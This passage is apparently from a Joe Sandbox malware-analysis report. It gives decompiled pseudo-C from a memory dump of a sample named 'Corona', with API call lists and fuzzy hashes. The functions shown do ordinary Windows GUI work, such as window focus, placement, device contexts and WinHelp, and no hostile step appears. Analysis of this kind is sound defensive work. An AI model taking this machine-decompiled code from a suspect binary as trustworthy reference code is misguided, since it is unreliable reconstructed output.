                                  												break;
                                  											}
                                  											_t373 = _t373 + 1;
                                  											_t291 = _t291 - 1;
                                  											__eflags = _t291;
                                  											if(_t291 != 0) {
                                  												continue;
                                  											} else {
                                  												goto L67;
                                  											}
                                  											goto L68;
                                  										}
                                  										_t257 = E0044151C(E004136F8(_v8, _t373), 1,  *((intOrPtr*)(_v36 + 8)));
                                  										__eflags = _t257;
                                  										if(_t257 == 0) {
                                  											_t265 = E004136F8(_v8, _t373);
                                  											__eflags = 0;
                                  											_t257 = E0044151C(_t265, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                  										}
                                  										_t353 =  *0x451104; // 0x452bb4
                                  										_t355 =  *( *_t353 + 0x6c);
                                  										__eflags = _t355;
                                  										if(_t355 != 0) {
                                  											__eflags = _t257;
                                  											if(_t257 == 0) {
                                  												_t257 =  *(_t355 + 0x158);
                                  											}
                                  											_t307 =  *0x451104; // 0x452bb4
                                  											__eflags =  *(_t355 + 0x228) & 0x00000008;
                                  											if(( *(_t355 + 0x228) & 0x00000008) == 0) {
                                  												_t356 =  *0x450fc8; // 0x452bb0
                                  												E0044E220( *_t356, _t291, _t307, _t257, _t373, _t375);
                                  											} else {
                                  												E0044E288();
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L67:
                                  									_push( *(_t375 + 8));
                                  									_push( *(_t375 + 4));
                                  									_push( *_t375);
                                  									_t144 =  *((intOrPtr*)(_v8 + 0x10));
                                  									_push(_t144);
                                  									L00406294();
                                  									 *((intOrPtr*)(_t375 + 0xc)) = _t144;
                                  								}
                                  								L68:
                                  								_pop(_t311);
                                  								 *[fs:eax] = _t311;
                                  								_push(0x442736);
                                  								return E00403E4C( &_v52);
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L69:
                                  			}

                                  APIs
                                  • SaveDC.GDI32(?), ref: 004424CB
                                  • RestoreDC.GDI32(?,?), ref: 0044253F
                                  • 72E7B080.USER32(?,00000000,0044272F), ref: 004425B9
                                  • SaveDC.GDI32(?), ref: 004425F0
                                  • RestoreDC.GDI32(?,?), ref: 0044265D
                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044272F), ref: 00442711
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4024241980-0
                                  • Opcode ID: 248aab9645699cb887edc6df762108ab4af923a67125c494b005b0ac249ed158
                                  • Instruction ID: edc1d04ca6091e2f80cee404feeb526d46385273312ca3e62fa202349d07fd40
                                  • Opcode Fuzzy Hash: 248aab9645699cb887edc6df762108ab4af923a67125c494b005b0ac249ed158
                                  • Instruction Fuzzy Hash: 0BE15E34A006059FEB10DFAAC58199EF7F5FF48304B6185AAF801A7365C7B8ED41CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E004473A0(intOrPtr __eax, struct HWND__** __edx) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				intOrPtr _v16;
                                  				struct HDC__* _v20;
                                  				struct HWND__* _v24;
                                  				void* __ebp;
                                  				struct HWND__* _t92;
                                  				intOrPtr _t112;
                                  				intOrPtr _t115;
                                  				struct HWND__* _t121;
                                  				struct HWND__* _t124;
                                  				intOrPtr _t128;
                                  				struct HWND__* _t129;
                                  				intOrPtr _t130;
                                  				intOrPtr _t131;
                                  				struct HWND__* _t133;
                                  				struct HWND__* _t136;
                                  				intOrPtr _t142;
                                  				intOrPtr _t172;
                                  				struct HDC__* _t177;
                                  				struct HWND__** _t200;
                                  				struct HWND__* _t218;
                                  				struct HWND__* _t219;
                                  				intOrPtr _t228;
                                  				void* _t230;
                                  				void* _t231;
                                  				intOrPtr _t237;
                                  				intOrPtr _t245;
                                  				struct HWND__* _t249;
                                  				struct HWND__* _t250;
                                  				struct HWND__* _t255;
                                  				struct HWND__* _t256;
                                  				void* _t258;
                                  				void* _t260;
                                  				intOrPtr _t261;
                                  				void* _t263;
                                  				void* _t267;
                                  
                                  				_t258 = _t260;
                                  				_t261 = _t260 + 0xffffffec;
                                  				_t200 = __edx;
                                  				_v8 = __eax;
                                  				_t92 =  *__edx;
                                  				_t218 = _t92;
                                  				_t263 = _t218 - 0x46;
                                  				if(_t263 > 0) {
                                  					_t219 = _t218 - 0xb01a;
                                  					__eflags = _t219;
                                  					if(_t219 == 0) {
                                  						__eflags =  *(_v8 + 0xa0);
                                  						if(__eflags != 0) {
                                  							E004032F8(_v8, __eflags);
                                  						}
                                  					} else {
                                  						__eflags = _t219 == 1;
                                  						if(_t219 == 1) {
                                  							__eflags =  *(_v8 + 0xa0);
                                  							if(__eflags != 0) {
                                  								E004032F8(_v8, __eflags);
                                  							}
                                  						} else {
                                  							goto L41;
                                  						}
                                  					}
                                  					goto L43;
                                  				} else {
                                  					if(_t263 == 0) {
                                  						_t112 = _v8;
                                  						_t228 =  *0x4477d4; // 0x1
                                  						__eflags = _t228 - ( *(_t112 + 0x1c) &  *0x4477d0);
                                  						if(_t228 == ( *(_t112 + 0x1c) &  *0x4477d0)) {
                                  							_t115 = _v8;
                                  							__eflags =  *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff;
                                  							if( *((intOrPtr*)(_t115 + 0x230)) - 0xffffffffffffffff < 0) {
                                  								_t128 = _v8;
                                  								__eflags =  *((char*)(_t128 + 0x22b)) - 2;
                                  								if( *((char*)(_t128 + 0x22b)) != 2) {
                                  									_t129 = __edx[2];
                                  									_t26 = _t129 + 0x18;
                                  									 *_t26 =  *(_t129 + 0x18) | 0x00000002;
                                  									__eflags =  *_t26;
                                  								}
                                  							}
                                  							_t121 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                  							__eflags = _t121;
                                  							if(_t121 == 0) {
                                  								L30:
                                  								_t124 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                  								__eflags = _t124;
                                  								if(_t124 == 0) {
                                  									L32:
                                  									 *( *((intOrPtr*)(_t200 + 8)) + 0x18) =  *( *((intOrPtr*)(_t200 + 8)) + 0x18) | 0x00000001;
                                  								} else {
                                  									__eflags = _t124 == 3;
                                  									if(_t124 == 3) {
                                  										goto L32;
                                  									}
                                  								}
                                  							} else {
                                  								__eflags = _t121 == 2;
                                  								if(_t121 == 2) {
                                  									goto L30;
                                  								}
                                  							}
                                  						}
                                  						goto L43;
                                  					} else {
                                  						_t230 = _t218 + 0xfffffffa - 3;
                                  						if(_t230 < 0) {
                                  							__eflags =  *0x450c20;
                                  							if( *0x450c20 != 0) {
                                  								__eflags =  *__edx - 7;
                                  								if( *__edx != 7) {
                                  									goto L43;
                                  								} else {
                                  									_t130 = _v8;
                                  									__eflags =  *(_t130 + 0x1c) & 0x00000010;
                                  									if(( *(_t130 + 0x1c) & 0x00000010) != 0) {
                                  										goto L43;
                                  									} else {
                                  										_t255 = 0;
                                  										_t131 = _v8;
                                  										__eflags =  *((char*)(_t131 + 0x22f)) - 2;
                                  										if( *((char*)(_t131 + 0x22f)) != 2) {
                                  											_t133 =  *(_v8 + 0x220);
                                  											__eflags = _t133;
                                  											if(_t133 != 0) {
                                  												__eflags = _t133 - _v8;
                                  												if(_t133 != _v8) {
                                  													_t255 = E00434EF4(_t133);
                                  												}
                                  											}
                                  										} else {
                                  											_t136 = E00447CCC(_v8);
                                  											__eflags = _t136;
                                  											if(_t136 != 0) {
                                  												_t255 = E00434EF4(E00447CCC(_v8));
                                  											}
                                  										}
                                  										__eflags = _t255;
                                  										if(_t255 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t92 = SetFocus(_t255);
                                  										}
                                  									}
                                  								}
                                  							}
                                  							goto L44;
                                  						} else {
                                  							_t231 = _t230 - 0x22;
                                  							if(_t231 == 0) {
                                  								_v24 = __edx[2];
                                  								__eflags = _v24->i - 1;
                                  								if(_v24->i != 1) {
                                  									goto L43;
                                  								} else {
                                  									_t142 = _v8;
                                  									__eflags =  *(_t142 + 0x248);
                                  									if( *(_t142 + 0x248) == 0) {
                                  										goto L43;
                                  									} else {
                                  										_t249 = E004414EC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_v24 + 8)));
                                  										__eflags = _t249;
                                  										if(_t249 == 0) {
                                  											goto L43;
                                  										} else {
                                  											_v16 = E0041CD48(0, 1);
                                  											_push(_t258);
                                  											_push(0x447619);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t261;
                                  											_v12 = SaveDC( *(_v24 + 0x18));
                                  											_push(_t258);
                                  											_push(0x4475fc);
                                  											_push( *[fs:eax]);
                                  											 *[fs:eax] = _t261;
                                  											E0041D34C(_v16,  *(_v24 + 0x18));
                                  											E0041D1EC(_v16);
                                  											E004429D4(_t249, _v24 + 0x1c, _v16,  *((intOrPtr*)(_v24 + 0x10)));
                                  											_pop(_t237);
                                  											 *[fs:eax] = _t237;
                                  											_push(0x447603);
                                  											__eflags = 0;
                                  											E0041D34C(_v16, 0);
                                  											return RestoreDC( *(_v24 + 0x18), _v12);
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								if(_t231 == 1) {
                                  									_t256 = __edx[2];
                                  									__eflags = _t256->i - 1;
                                  									if(_t256->i != 1) {
                                  										goto L43;
                                  									} else {
                                  										_t172 = _v8;
                                  										__eflags =  *(_t172 + 0x248);
                                  										if( *(_t172 + 0x248) == 0) {
                                  											goto L43;
                                  										} else {
                                  											_t250 = E004414EC( *((intOrPtr*)(_v8 + 0x248)), 0,  *((intOrPtr*)(_t256 + 8)));
                                  											__eflags = _t250;
                                  											if(_t250 == 0) {
                                  												goto L43;
                                  											} else {
                                  												_t177 = E00434EF4(_v8);
                                  												L00406484();
                                  												_v20 = _t177;
                                  												 *[fs:eax] = _t261;
                                  												_v16 = E0041CD48(0, 1);
                                  												 *[fs:eax] = _t261;
                                  												_v12 = SaveDC(_v20);
                                  												 *[fs:eax] = _t261;
                                  												E0041D34C(_v16, _v20);
                                  												E0041D1EC(_v16);
                                  												 *((intOrPtr*)(_t250->i + 0x38))(_t256 + 0x10,  *[fs:eax], 0x447703, _t258,  *[fs:eax], 0x447720, _t258,  *[fs:eax], 0x447747, _t258, _t177);
                                  												_pop(_t245);
                                  												 *[fs:eax] = _t245;
                                  												_push(0x44770a);
                                  												__eflags = 0;
                                  												E0041D34C(_v16, 0);
                                  												return RestoreDC(_v20, _v12);
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									L41:
                                  									_t267 = _t92 -  *0x452bbc; // 0xc075
                                  									if(_t267 == 0) {
                                  										E0042F98C(_v8, 0, 0xb025, 0);
                                  										E0042F98C(_v8, 0, 0xb024, 0);
                                  										E0042F98C(_v8, 0, 0xb035, 0);
                                  										E0042F98C(_v8, 0, 0xb009, 0);
                                  										E0042F98C(_v8, 0, 0xb008, 0);
                                  										E0042F98C(_v8, 0, 0xb03d, 0);
                                  									}
                                  									L43:
                                  									_t92 = E00432908(_v8, _t200);
                                  									L44:
                                  									return _t92;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: RestoreSave$B080Focus
                                  • String ID:
                                  • API String ID: 809140284-0
                                  • Opcode ID: 9e5d8527c3b7fc5048a8820b339ea4baaa03bef5cdb50cfec420b4c4a6d0b5fc
                                  • Instruction ID: 4d7df4f1f8f5a44da635d72099b31af43b60ad2639d384f672acc3bf9dbbf1cb
                                  • Opcode Fuzzy Hash: 9e5d8527c3b7fc5048a8820b339ea4baaa03bef5cdb50cfec420b4c4a6d0b5fc
                                  • Instruction Fuzzy Hash: 19B1A434A04104EFDB11DF69C986AAEB7F5EB49304FA544BAF414DB351C738AE42CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0044D700(void* __eax) {
                                  				struct HWND__* _t21;
                                  				intOrPtr* _t26;
                                  				signed int _t29;
                                  				intOrPtr* _t30;
                                  				int _t33;
                                  				intOrPtr _t36;
                                  				void* _t51;
                                  				int _t60;
                                  
                                  				_t51 = __eax;
                                  				_t21 = IsIconic( *(__eax + 0x30));
                                  				if(_t21 != 0) {
                                  					SetActiveWindow( *(_t51 + 0x30));
                                  					if( *((intOrPtr*)(_t51 + 0x44)) == 0 ||  *((char*)(_t51 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t51 + 0x44)) + 0x57)) == 0) {
                                  						L6:
                                  						E0044C668( *(_t51 + 0x30), 9, __eflags);
                                  					} else {
                                  						_t60 = IsWindowEnabled(E00434EF4( *((intOrPtr*)(_t51 + 0x44))));
                                  						if(_t60 == 0) {
                                  							goto L6;
                                  						} else {
                                  							_push(0);
                                  							_push(0xf120);
                                  							_push(0x112);
                                  							_push( *(_t51 + 0x30));
                                  							L00406294();
                                  						}
                                  					}
                                  					_t26 =  *0x450e7c; // 0x4528f8
                                  					_t29 =  *((intOrPtr*)( *_t26))(1, 0, 0, 0x40) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					_t30 =  *0x450e7c; // 0x4528f8
                                  					_t33 =  *((intOrPtr*)( *_t30))(0, _t29) >> 1;
                                  					if(_t60 < 0) {
                                  						asm("adc eax, 0x0");
                                  					}
                                  					SetWindowPos( *(_t51 + 0x30), 0, _t33, ??, ??, ??, ??);
                                  					_t36 =  *((intOrPtr*)(_t51 + 0x44));
                                  					if(_t36 != 0 &&  *((char*)(_t36 + 0x22b)) == 1 &&  *((char*)(_t36 + 0x57)) == 0) {
                                  						E00448374(_t36, 0);
                                  						E0044A790( *((intOrPtr*)(_t51 + 0x44)));
                                  					}
                                  					E0044CD48(_t51);
                                  					_t21 =  *0x452bb4; // 0x2131320
                                  					_t55 =  *((intOrPtr*)(_t21 + 0x64));
                                  					if( *((intOrPtr*)(_t21 + 0x64)) != 0) {
                                  						_t21 = SetFocus(E00434EF4(_t55));
                                  					}
                                  					if( *((short*)(_t51 + 0x122)) != 0) {
                                  						return  *((intOrPtr*)(_t51 + 0x120))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}

                                  APIs
                                  • IsIconic.USER32 ref: 0044D708
                                  • SetActiveWindow.USER32(?,?,?,?,0044D129,00000000,0044D5EA), ref: 0044D719
                                  • IsWindowEnabled.USER32(00000000), ref: 0044D73C
                                  • NtdllDefWindowProc_A.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,0044D129,00000000,0044D5EA), ref: 0044D755
                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,0044D129,00000000,0044D5EA), ref: 0044D79B
                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,0044D129,00000000,0044D5EA), ref: 0044D7E0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledFocusIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 3996302123-0
                                  • Opcode ID: a16b760ae94434b04022004084b0f6596c65f1df00944d32fc5a4de108a3ffc9
                                  • Instruction ID: 918a6c987cfd56faad6950451867ad2e51d243e2933107cfe1e5344e1d6f4fb7
                                  • Opcode Fuzzy Hash: a16b760ae94434b04022004084b0f6596c65f1df00944d32fc5a4de108a3ffc9
                                  • Instruction Fuzzy Hash: 0431DF75B002409BFB25AF69CD86B5637A8AB09704F0904BAB900DF2D7DA7DEC40871D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E004348E0(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                                  				void* _v20;
                                  				struct _WINDOWPLACEMENT _v48;
                                  				char _v64;
                                  				void* _t31;
                                  				int _t45;
                                  				int _t51;
                                  				void* _t52;
                                  				int _t56;
                                  				int _t58;
                                  
                                  				_t56 = __ecx;
                                  				_t58 = __edx;
                                  				_t52 = __eax;
                                  				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                                  					L4:
                                  					if(E00435154(_t52) == 0) {
                                  						L7:
                                  						 *(_t52 + 0x40) = _t58;
                                  						 *(_t52 + 0x44) = _t56;
                                  						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                                  						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                                  						_t31 = E00435154(_t52);
                                  						__eflags = _t31;
                                  						if(_t31 != 0) {
                                  							_v48.length = 0x2c;
                                  							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  							E0042E194(_t52,  &_v64);
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							asm("movsd");
                                  							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                                  						}
                                  						L9:
                                  						E0042DE48(_t52);
                                  						return E004032F8(_t52, _t66);
                                  					}
                                  					_t45 = IsIconic( *(_t52 + 0x180));
                                  					_t66 = _t45;
                                  					if(_t45 != 0) {
                                  						goto L7;
                                  					}
                                  					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                                  					goto L9;
                                  				} else {
                                  					_t51 = _a4;
                                  					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                                  						return _t51;
                                  					}
                                  					goto L4;
                                  				}
                                  			}













                                  APIs
                                  • IsIconic.USER32 ref: 0043491F
                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0043493D
                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00434973
                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00434997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Placement$Iconic
                                  • String ID: ,
                                  • API String ID: 568898626-3772416878
                                  • Opcode ID: 0d7a5fd8f8b9938bcd41b9888540019158a4420273bc2e43066675ea362c8ca3
                                  • Instruction ID: 75f4f6da7f127a85353d24d424ad45a40a3a9b02b649dcb1d2e9dfbbfb710552
                                  • Opcode Fuzzy Hash: 0d7a5fd8f8b9938bcd41b9888540019158a4420273bc2e43066675ea362c8ca3
                                  • Instruction Fuzzy Hash: E7213171A00108ABCF54EFA9C8C1ADB77A8AF4D314F04957AFD14EF346D679E9048B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0042397C(void* __edi, struct HWND__* _a4, signed int _a8) {
                                  				struct _WINDOWPLACEMENT _v48;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				signed int _t19;
                                  				struct HWND__* _t23;
                                  
                                  				_t19 = _a8;
                                  				_t23 = _a4;
                                  				if( *0x452921 != 0) {
                                  					if((_t19 & 0x00000003) == 0) {
                                  						if(IsIconic(_t23) == 0) {
                                  							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                  						} else {
                                  							GetWindowPlacement(_t23,  &_v48);
                                  						}
                                  						return E004238EC( &(_v48.rcNormalPosition), _t19);
                                  					}
                                  					return 0x12340042;
                                  				}
                                  				 *0x4528fc = E0042377C(1, _t19,  *0x4528fc, __edi, _t23);
                                  				return  *0x4528fc(_t23, _t19);
                                  			}










                                  APIs
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  • MonitorFromWindow.USER32(?,?), ref: 004239AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressFromMonitorProcWindow
                                  • String ID: MonitorFromWindow
                                  • API String ID: 2184870004-2842599566
                                  • Opcode ID: 7cf7a69c5bf5c815999e72160732fef235a375ebba1c9548b5a6ec298b642f06
                                  • Instruction ID: ec62e6e023166cc2784e69140f7ce9fd6cb5baf1267b185c6a9d8d5770aff9fb
                                  • Opcode Fuzzy Hash: 7cf7a69c5bf5c815999e72160732fef235a375ebba1c9548b5a6ec298b642f06
                                  • Instruction Fuzzy Hash: 1301A7A27002285A8700EF95AC429BF73BC9B07306B804037F81197242D77DDF4197BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0044D650(void* __eax) {
                                  				int _t21;
                                  				struct HWND__* _t36;
                                  				void* _t40;
                                  
                                  				_t40 = __eax;
                                  				_t1 = _t40 + 0x30; // 0x0
                                  				_t21 = IsIconic( *_t1);
                                  				if(_t21 == 0) {
                                  					E0044CD38();
                                  					_t2 = _t40 + 0x30; // 0x0
                                  					SetActiveWindow( *_t2);
                                  					if( *((intOrPtr*)(_t40 + 0x44)) == 0 ||  *((char*)(_t40 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_t40 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E00434EF4( *((intOrPtr*)(_t40 + 0x44)))) == 0) {
                                  						_t15 = _t40 + 0x30; // 0x0
                                  						_t21 = E0044C668( *_t15, 6, __eflags);
                                  					} else {
                                  						_t43 =  *((intOrPtr*)(_t40 + 0x44));
                                  						_t36 = E00434EF4( *((intOrPtr*)(_t40 + 0x44)));
                                  						_t13 = _t40 + 0x30; // 0x0
                                  						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                  						_push(0);
                                  						_push(0xf020);
                                  						_push(0x112);
                                  						_t14 = _t40 + 0x30; // 0x0
                                  						_t21 =  *_t14;
                                  						_push(_t21);
                                  						L00406294();
                                  					}
                                  					if( *((short*)(_t40 + 0x11a)) != 0) {
                                  						return  *((intOrPtr*)(_t40 + 0x118))();
                                  					}
                                  				}
                                  				return _t21;
                                  			}







                                  APIs
                                  • IsIconic.USER32 ref: 0044D658
                                  • SetActiveWindow.USER32(00000000,00000000,?,?,0044DCFC), ref: 0044D670
                                  • IsWindowEnabled.USER32(00000000), ref: 0044D693
                                  • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0044DCFC), ref: 0044D6BC
                                  • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0044D6D1
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$ActiveEnabledIconicNtdllProc_
                                  • String ID:
                                  • API String ID: 1720852555-0
                                  • Opcode ID: 917127f4f3a077147801a2d069bb387387e8d0d55a4abb02a5392bdd6f5054ef
                                  • Instruction ID: e827ea6bbb3586439ad2d09fdcd350d6e3c7bf510f591e8dd60aea57682e3bbe
                                  • Opcode Fuzzy Hash: 917127f4f3a077147801a2d069bb387387e8d0d55a4abb02a5392bdd6f5054ef
                                  • Instruction Fuzzy Hash: 5D11E2716012005BEB54EF69C9C6F9737E8AF08304F49147ABA09DF297D679EC41CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E004294BC(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				CHAR* _t20;
                                  				long _t25;
                                  				intOrPtr _t30;
                                  				void* _t34;
                                  				intOrPtr _t37;
                                  
                                  				_push(0);
                                  				_t34 = __eax;
                                  				_push(_t37);
                                  				_push(0x429539);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t37;
                                  				E00428F1C(__eax);
                                  				_t25 = GetTickCount();
                                  				do {
                                  					Sleep(0);
                                  				} while (GetTickCount() - _t25 <= 0x3e8);
                                  				E00428B1C(_t34, _t25,  &_v8, 0, __edi, _t34);
                                  				if(_v8 != 0) {
                                  					_t20 = E0040430C(_v8);
                                  					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                  				}
                                  				_pop(_t30);
                                  				 *[fs:eax] = _t30;
                                  				_push(0x429540);
                                  				return E00403E4C( &_v8);
                                  			}










                                  APIs
                                    • Part of subcall function 00428F1C: WinHelpA.USER32 ref: 00428F2B
                                  • GetTickCount.KERNEL32 ref: 004294DA
                                  • Sleep.KERNEL32(00000000,00000000,00429539,?,?,00000000,00000000,?,004294B2), ref: 004294E3
                                  • GetTickCount.KERNEL32 ref: 004294E8
                                  • WinHelpA.USER32 ref: 0042951E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CountHelpTick$Sleep
                                  • String ID:
                                  • API String ID: 2438605093-0
                                  • Opcode ID: 2648394aedcc0988b06fd2674811b10b7ee4e2b38959a4e77d98242bdde8c640
                                  • Instruction ID: 55332f343a0af43235d418ecb5ea4b194d2f74e408beee42534c5113f3eb7bf7
                                  • Opcode Fuzzy Hash: 2648394aedcc0988b06fd2674811b10b7ee4e2b38959a4e77d98242bdde8c640
                                  • Instruction Fuzzy Hash: EC01AD71704614AFE711FBA6DD52B1EB7A8DB08B04FA1417BF400A76C2DE7CAE009669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0041DBAC(intOrPtr __eax, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v48;
                                  				struct _SYSTEM_INFO* _t17;
                                  				unsigned int _t20;
                                  				unsigned int _t22;
                                  				signed int _t31;
                                  				intOrPtr _t33;
                                  
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t17 =  &_v48;
                                  				GetSystemInfo(_t17);
                                  				_t33 = _v8;
                                  				_t31 = _v12 - 1;
